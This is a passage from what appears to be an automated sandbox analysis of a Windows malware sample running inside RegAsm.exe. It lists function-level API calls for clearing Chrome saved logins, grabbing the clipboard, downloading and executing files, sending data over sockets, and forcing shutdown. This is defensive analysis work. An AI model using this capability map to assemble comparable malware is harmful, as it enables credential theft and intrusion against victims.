                                                                • ExitWindowsEx.USER32(00000000,00000001), ref: 00416891
                                                                • LoadLibraryA.KERNEL32(PowrProf.dll,SetSuspendState,00000000,00000000,00000000), ref: 004168A6
                                                                • GetProcAddress.KERNEL32(00000000), ref: 004168AD
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ProcessToken$AddressAdjustCurrentErrorExitLastLibraryLoadLookupOpenPrivilegePrivilegesProcValueWindows
                                                                • String ID: !D@$PowrProf.dll$SetSuspendState
                                                                • API String ID: 1589313981-2876530381
                                                                • Opcode ID: 4bd10a5f799b95ac4237c352870c0353e076f464d26d690b152e3588c70e8aba
                                                                • Instruction ID: 272f3f60014ab8f8f2fa2781f50e1ac7d9ab3f628c5d0f86ef79d7992e461550
                                                                • Opcode Fuzzy Hash: 4bd10a5f799b95ac4237c352870c0353e076f464d26d690b152e3588c70e8aba
                                                                • Instruction Fuzzy Hash: D821B17060430166CA14FBB28856ABF36599F41388F41087FB501671D2EF3DD845C76E
                                                                Function 0040BA4D Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 49fileCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Login Data), ref: 0040BA89
                                                                • GetLastError.KERNEL32 ref: 0040BA93
                                                                Strings
                                                                • UserProfile, xrefs: 0040BA59
                                                                • \AppData\Local\Google\Chrome\User Data\Default\Login Data, xrefs: 0040BA54
                                                                • [Chrome StoredLogins found, cleared!], xrefs: 0040BAB9
                                                                • [Chrome StoredLogins not found], xrefs: 0040BAAD
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: DeleteErrorFileLast
                                                                • String ID: [Chrome StoredLogins found, cleared!]$[Chrome StoredLogins not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Login Data
                                                                • API String ID: 2018770650-1062637481
                                                                • Opcode ID: 0e12c434a704d568d93f0e9ae73d02a011f2f49309dc381e150468c0f0ecafbd
                                                                • Instruction ID: 0532e36a1aab116e50a9f1d1704ee325f44086adb43c50cfffb7bf5285f9a594
                                                                • Opcode Fuzzy Hash: 0e12c434a704d568d93f0e9ae73d02a011f2f49309dc381e150468c0f0ecafbd
                                                                • Instruction Fuzzy Hash: 76018F61A402056ACB04B7B6DC5B9BE7724A921704B50057FF806722D2FE7D49098BDE
                                                                Function 0041798D Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 33COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetCurrentProcess.KERNEL32(00000028,?), ref: 0041799A
                                                                • OpenProcessToken.ADVAPI32(00000000), ref: 004179A1
                                                                • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004179B3
                                                                • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 004179D2
                                                                • GetLastError.KERNEL32 ref: 004179D8
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
                                                                • String ID: SeShutdownPrivilege
                                                                • API String ID: 3534403312-3733053543
                                                                • Opcode ID: d49d9c43419eaec1bfbdc5cb8a800583ef6843b46de48ba71f06d4aa9fea9060
                                                                • Instruction ID: 35ac2027e355ce869dd6e937a138cd84cb59798e299a7bc9dfe05b1c572390d3
                                                                • Opcode Fuzzy Hash: d49d9c43419eaec1bfbdc5cb8a800583ef6843b46de48ba71f06d4aa9fea9060
                                                                • Instruction Fuzzy Hash: 38F03A71802229FBDB10ABA1EC4DAEF7FBCEF05612F100465B909A1152D7348E04CBB5
                                                                Function 004541D9 Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1381COMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: __floor_pentium4
                                                                • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                • API String ID: 4168288129-2761157908
                                                                • Opcode ID: e29b251e1eee29052bf5b6da388e4b2e308b35626dbf2dd5d7aa75add96dd8b0
                                                                • Instruction ID: 22fd31c6184e07a9d3e8c26eafc68e38345e899adb4ac4f90a3aea4af7cb717d
                                                                • Opcode Fuzzy Hash: e29b251e1eee29052bf5b6da388e4b2e308b35626dbf2dd5d7aa75add96dd8b0
                                                                • Instruction Fuzzy Hash: BBC27E71D046288FDB25CE28DD407EAB3B5EB8530AF1541EBD80DE7241E778AE898F45
                                                                Function 0040928E Relevance: 9.3, APIs: 6, Instructions: 293fileCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • __EH_prolog.LIBCMT ref: 00409293
                                                                  • Part of subcall function 004048C8: connect.WS2_32(?,?,?), ref: 004048E0
                                                                  • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 0040932F
                                                                • FindFirstFileW.KERNEL32(00000000,?,?,?,00000064), ref: 0040938D
                                                                • FindNextFileW.KERNEL32(00000000,?), ref: 004093E5
                                                                • FindClose.KERNEL32(00000000), ref: 004093FC
                                                                  • Part of subcall function 00404E26: WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E38
                                                                  • Part of subcall function 00404E26: SetEvent.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E43
                                                                  • Part of subcall function 00404E26: CloseHandle.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E4C
                                                                • FindClose.KERNEL32(00000000), ref: 004095F4
                                                                  • Part of subcall function 00404AA1: WaitForSingleObject.KERNEL32(?,00000000,0040547D,?,?,00000004,?,?,00000004,?,00474EF8,?), ref: 00404B47
                                                                  • Part of subcall function 00404AA1: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,?,00474EF8,?,?,?,?,?,?,0040547D), ref: 00404B75
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Find$Close$EventFileObjectSingleWait$Exception@8FirstH_prologHandleNextThrowconnectsend
                                                                • String ID:
                                                                • API String ID: 1824512719-0
                                                                • Opcode ID: 403e8f00e880f72b82558a69448ef6646ea8491fdd4c1094c816304795b95f0e
                                                                • Instruction ID: 89df7f8b75d3b77417eb58d09b4f39b7dfb13bde992cfd9524fc7595df83f5be
                                                                • Opcode Fuzzy Hash: 403e8f00e880f72b82558a69448ef6646ea8491fdd4c1094c816304795b95f0e
                                                                • Instruction Fuzzy Hash: 34B19D32900109AACB14EBA1DD92AEDB379AF44314F50417FF506B60E2EF785F49CB59
                                                                Function 0041AADB Relevance: 9.0, APIs: 6, Instructions: 39serviceCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • OpenSCManagerW.ADVAPI32(00000000,00000000,00000010,00000000,00000001,?,0041A731,00000000), ref: 0041AAE4
                                                                • OpenServiceW.ADVAPI32(00000000,00000000,00000010,?,0041A731,00000000), ref: 0041AAF9
                                                                • CloseServiceHandle.ADVAPI32(00000000,?,0041A731,00000000), ref: 0041AB06
                                                                • StartServiceW.ADVAPI32(00000000,00000000,00000000,?,0041A731,00000000), ref: 0041AB11
                                                                • CloseServiceHandle.ADVAPI32(00000000,?,0041A731,00000000), ref: 0041AB23
                                                                • CloseServiceHandle.ADVAPI32(00000000,?,0041A731,00000000), ref: 0041AB26
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Service$CloseHandle$Open$ManagerStart
                                                                • String ID:
                                                                • API String ID: 276877138-0
                                                                • Opcode ID: e30b05f20183ba3613960b636cce26fc80956d1a3587d8fe59d4f8762fcd24c9
                                                                • Instruction ID: 14dbf03deabb1432b93a26d2ddf90514dbbc411f15d31c7908333a88c2a5d316
                                                                • Opcode Fuzzy Hash: e30b05f20183ba3613960b636cce26fc80956d1a3587d8fe59d4f8762fcd24c9
                                                                • Instruction Fuzzy Hash: FEF0E971141225AFD2115B209C88DFF276CDF85B66B00082AF901921919B68CC45E579
                                                                Function 004524BC Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 86COMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                APIs
                                                                • GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,004527DB,?,00000000), ref: 00452555
                                                                • GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,004527DB,?,00000000), ref: 0045257E
                                                                • GetACP.KERNEL32(?,?,004527DB,?,00000000), ref: 00452593
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: InfoLocale
                                                                • String ID: ACP$OCP
                                                                • API String ID: 2299586839-711371036
                                                                • Opcode ID: 61c68c86ee519c97ea86d50e82dd2762e668b1fdc7e44e8e256cfbf4b452970f
                                                                • Instruction ID: 097c3b5166b2d36aca1cb621bb06e922528e2ea4561953c90108b9915aa2a338
                                                                • Opcode Fuzzy Hash: 61c68c86ee519c97ea86d50e82dd2762e668b1fdc7e44e8e256cfbf4b452970f
                                                                • Instruction Fuzzy Hash: 7E21F932600108B6D734CF14CA10A9B73A6EB16B53B564467ED09D7312F7B6DD44C398
                                                                Function 0041B539 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 25COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • FindResourceA.KERNEL32(SETTINGS,0000000A,00000000), ref: 0041B54A
                                                                • LoadResource.KERNEL32(00000000,?,?,0040F419,00000000), ref: 0041B55E
                                                                • LockResource.KERNEL32(00000000,?,?,0040F419,00000000), ref: 0041B565
                                                                • SizeofResource.KERNEL32(00000000,?,?,0040F419,00000000), ref: 0041B574
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Resource$FindLoadLockSizeof
                                                                • String ID: SETTINGS
                                                                • API String ID: 3473537107-594951305
                                                                • Opcode ID: a45aaf07b9511fe1cfb91064365b640b81f442c86eb18a115f7d7951e0b61df2
                                                                • Instruction ID: d04f7a3eece584ab18b37ce022e38df3785cd6d6757b7dd0dc659012c7d5cbc3
                                                                • Opcode Fuzzy Hash: a45aaf07b9511fe1cfb91064365b640b81f442c86eb18a115f7d7951e0b61df2
                                                                • Instruction Fuzzy Hash: 8EE01A76600B22EBEB211BB1AC4CD863E29F7C97637140075F90586231CB798840DA98
                                                                Function 004096A0 Relevance: 7.7, APIs: 5, Instructions: 222fileCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • __EH_prolog.LIBCMT ref: 004096A5
                                                                • FindFirstFileW.KERNEL32(00000000,?,00000000,00000000,?), ref: 0040971D
                                                                • FindNextFileW.KERNEL32(00000000,?), ref: 00409746
                                                                • FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 0040975D
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Find$File$CloseFirstH_prologNext
                                                                • String ID:
                                                                • API String ID: 1157919129-0
                                                                • Opcode ID: d0906240c61558a8c2233d1a994a81c018a8f0e86e731917b8a7b38e081808ba
                                                                • Instruction ID: 8e52766585a78a9bd0f7e398a9017c7fe376444e683812dd136b20495b515571
                                                                • Opcode Fuzzy Hash: d0906240c61558a8c2233d1a994a81c018a8f0e86e731917b8a7b38e081808ba
                                                                • Instruction Fuzzy Hash: 7F814C328001099BCB15EBA2DC969EDB378AF14318F10417FE506B71E2EF789E49CB58
                                                                Function 00408847 Relevance: 7.7, APIs: 5, Instructions: 186fileCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • __EH_prolog.LIBCMT ref: 0040884C
                                                                • FindFirstFileW.KERNEL32(00000000,?,00466618,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00408905
                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 0040892D
                                                                • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040893A
                                                                • FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00408A50
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Find$File$CloseException@8FirstH_prologNextThrow
                                                                • String ID:
                                                                • API String ID: 1771804793-0
                                                                • Opcode ID: ab6c9de2ed3336f72dd1f653db28f709795552372b56743357816853fd5168b1
                                                                • Instruction ID: 0d5560aa06bbfb8d15084ed76e809f646cede1ce68103026aeaac9ba950e1e68
                                                                • Opcode Fuzzy Hash: ab6c9de2ed3336f72dd1f653db28f709795552372b56743357816853fd5168b1
                                                                • Instruction Fuzzy Hash: 9D517F72900209AACB04FB65DD569ED7778AF10308F50417FB906B71E2EF389B49CB89
                                                                Function 00406EEB Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 222filenetworkCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00406FF7
                                                                • URLDownloadToFileW.URLMON(00000000,00000000,00000004,00000000,00000000), ref: 004070DB
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: DownloadExecuteFileShell
                                                                • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$open
                                                                • API String ID: 2825088817-3056885514
                                                                • Opcode ID: 34e9f47cf7d86a81ede4f10af600f90cd6aaddafb670a034175ab46433b67298
                                                                • Instruction ID: 89f65c5a2840bfed21b3c91f130df949caec66636536da5e2ea9f2eef63816fc
                                                                • Opcode Fuzzy Hash: 34e9f47cf7d86a81ede4f10af600f90cd6aaddafb670a034175ab46433b67298
                                                                • Instruction Fuzzy Hash: 5261B371A0830166CA14FB76C8569BE37A59F81758F40093FB9427B2D3EE3C9905C69B
                                                                Function 00407877 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 86fileCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • FindFirstFileW.KERNEL32(00000000,?,?,?,00000000), ref: 00407892
                                                                • FindNextFileW.KERNEL32(00000000,?,?,?,00000000), ref: 0040795A
                                                                  • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: FileFind$FirstNextsend
                                                                • String ID: XPG$XPG
                                                                • API String ID: 4113138495-1962359302
                                                                • Opcode ID: 97075425f36b96f86d32918fbdfde2617eb7536786320fd924193231dd6544f4
                                                                • Instruction ID: fedc3c23448d2be437c2d68ef58725aa3c97e5c0e74d328490a6b39f64eed896
                                                                • Opcode Fuzzy Hash: 97075425f36b96f86d32918fbdfde2617eb7536786320fd924193231dd6544f4
                                                                • Instruction Fuzzy Hash: 2D21A4315083015BC714FB61D895CEFB3ACAF90358F40493EF696620E1FF78AA098A5B
                                                                Function 0041CA73 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 83COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041CB68
                                                                  • Part of subcall function 004137AA: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 004137B9
                                                                  • Part of subcall function 004137AA: RegSetValueExA.KERNEL32(?,004674C8,00000000,?,00000000,00000000,004752F0,?,?,0040F88E,004674C8,5.1.1 Pro), ref: 004137E1
                                                                  • Part of subcall function 004137AA: RegCloseKey.KERNEL32(?,?,?,0040F88E,004674C8,5.1.1 Pro), ref: 004137EC
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CloseCreateInfoParametersSystemValue
                                                                • String ID: Control Panel\Desktop$TileWallpaper$WallpaperStyle
                                                                • API String ID: 4127273184-3576401099
                                                                • Opcode ID: 0770bf726c9befaa45485f0dd67d4366664ca8a7637528448030d37bd09e249f
                                                                • Instruction ID: 8ac436d711b2fc3476497f69dc57c3b9a547a247a31514f467319d0910454585
                                                                • Opcode Fuzzy Hash: 0770bf726c9befaa45485f0dd67d4366664ca8a7637528448030d37bd09e249f
                                                                • Instruction Fuzzy Hash: D7118472BC425022E81831396D9BFBE28068343F61F54456BF6022A6CAE4CF6A9143CF
                                                                Function 00451D58 Relevance: 6.2, APIs: 4, Instructions: 236COMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                                  • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                                  • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                                  • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                                • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00444AF4,?,?,?,?,?,?,00000004), ref: 00451E3A
                                                                • _wcschr.LIBVCRUNTIME ref: 00451ECA
                                                                • _wcschr.LIBVCRUNTIME ref: 00451ED8
                                                                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,00444AF4,00000000,00444C14), ref: 00451F7B
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_abort_free
                                                                • String ID:
                                                                • API String ID: 4212172061-0
                                                                • Opcode ID: 542ab58a55aa9f08c463a9389d0e41dfe4354c1e35855495671bf6e32f2bde7c
                                                                • Instruction ID: 2c98265d6c7a89d72caae9d33925a6d6107158c78f730362dcab12f0c71d6669
                                                                • Opcode Fuzzy Hash: 542ab58a55aa9f08c463a9389d0e41dfe4354c1e35855495671bf6e32f2bde7c
                                                                • Instruction Fuzzy Hash: 7F611976600606AAD714AB75CC42FBB73A8EF04306F14056FFD05DB292EB78E948C769
                                                                Function 0045201B Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 63COMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                                  • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                                  • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                                  • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                                • EnumSystemLocalesW.KERNEL32(00452143,00000001,00000000,?,JD,?,00452770,00000000,?,?,?), ref: 0045208D
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                                • String ID: p'E$JD
                                                                • API String ID: 1084509184-908320845
                                                                • Opcode ID: 475d6d5c58d7186cd22417851423cdf86cfe6bc0717def2965f4a7021c27fb53
                                                                • Instruction ID: b0e9e6415e7ea3a3ed95e939ef0edb9d062384d4a1a0bde9f31cc9ceae225fa6
                                                                • Opcode Fuzzy Hash: 475d6d5c58d7186cd22417851423cdf86cfe6bc0717def2965f4a7021c27fb53
                                                                • Instruction Fuzzy Hash: 0211553A2007019FDB189F39C9916BBBB92FF8075AB14482EEE4687B41D7B5A946C740
                                                                Function 00452143 Relevance: 4.7, APIs: 3, Instructions: 205COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                                  • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                                  • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                                  • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                                  • Part of subcall function 00448295: _free.LIBCMT ref: 004482F4
                                                                  • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 00448301
                                                                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00452197
                                                                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004521E8
                                                                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004522A8
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ErrorInfoLastLocale$_free$_abort
                                                                • String ID:
                                                                • API String ID: 2829624132-0
                                                                • Opcode ID: 1ce7e7c7dfcd5f502045176aa51a1e3ace1f8c45826c3dbb4c0c9878229dab74
                                                                • Instruction ID: 283aa9570716a6929da4b93cb0bca45b8c77d553a5ebfd19e37a994bad1de6ac
                                                                • Opcode Fuzzy Hash: 1ce7e7c7dfcd5f502045176aa51a1e3ace1f8c45826c3dbb4c0c9878229dab74
                                                                • Instruction Fuzzy Hash: F361A235500207ABDF289F24CE82B7A77A8EF05306F1441BBED05C6656E7BC9D89CB58
                                                                Function 0043BB71 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                APIs
                                                                • IsDebuggerPresent.KERNEL32 ref: 0043BC69
                                                                • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0043BC73
                                                                • UnhandledExceptionFilter.KERNEL32(?), ref: 0043BC80
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                • String ID:
                                                                • API String ID: 3906539128-0
                                                                • Opcode ID: 1e0b73e88f7870ac8a7e49df57248e9339733cda2bb7518ac33a0b9eb889d704
                                                                • Instruction ID: 25e88f5a56b9fbea854716c485460a06fbe33a825339a9765be54c88dd7cea35
                                                                • Opcode Fuzzy Hash: 1e0b73e88f7870ac8a7e49df57248e9339733cda2bb7518ac33a0b9eb889d704
                                                                • Instruction Fuzzy Hash: 0431D374901218ABCB21DF65D9887CDBBB8EF0C311F5051EAE81CA7251EB749F818F48
                                                                Function 00443355 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                APIs
                                                                • GetCurrentProcess.KERNEL32(?,?,0044332B,?), ref: 00443376
                                                                • TerminateProcess.KERNEL32(00000000,?,0044332B,?), ref: 0044337D
                                                                • ExitProcess.KERNEL32 ref: 0044338F
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Process$CurrentExitTerminate
                                                                • String ID:
                                                                • API String ID: 1703294689-0
                                                                • Opcode ID: 4e3b9aa1e9039f050651c305726e439f17232b6e89e74059b12d513dd76054c6
                                                                • Instruction ID: 4b22f3a5ffe79ca7dfb81d814e561f82a31e4bef9a776fe0bb9daccb8e878f4b
                                                                • Opcode Fuzzy Hash: 4e3b9aa1e9039f050651c305726e439f17232b6e89e74059b12d513dd76054c6
                                                                • Instruction Fuzzy Hash: 9FE0B635401608FBDF11AF55DE09A5D3BAAEB40B56F005469FC498A272CF79EE42CB88
                                                                Function 0040B749 Relevance: 4.5, APIs: 3, Instructions: 19clipboardCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • OpenClipboard.USER32(00000000), ref: 0040B74C
                                                                • GetClipboardData.USER32(0000000D), ref: 0040B758
                                                                • CloseClipboard.USER32 ref: 0040B760
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Clipboard$CloseDataOpen
                                                                • String ID:
                                                                • API String ID: 2058664381-0
                                                                • Opcode ID: ee7560bd864c47a473b03ccd03fab4bf0c670c3a92a751b3696d255e79ff2f15
                                                                • Instruction ID: 1c65eecdd0087a0ffd0b0a04a5b63b9ff0c479b34dfa65f2e767e94bdce73387
                                                                • Opcode Fuzzy Hash: ee7560bd864c47a473b03ccd03fab4bf0c670c3a92a751b3696d255e79ff2f15
                                                                • Instruction Fuzzy Hash: 45E0EC31745320EFC3206B609C49F9B6AA4DF85B52F05443AB905BB2E5DB78CC4086AD
                                                                Function 0044E8F9 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 114COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID: .
                                                                • API String ID: 0-248832578
                                                                • Opcode ID: dab0a497b08e8df346a97c8899a5e14908918034842a488b938a10d87d6eec82
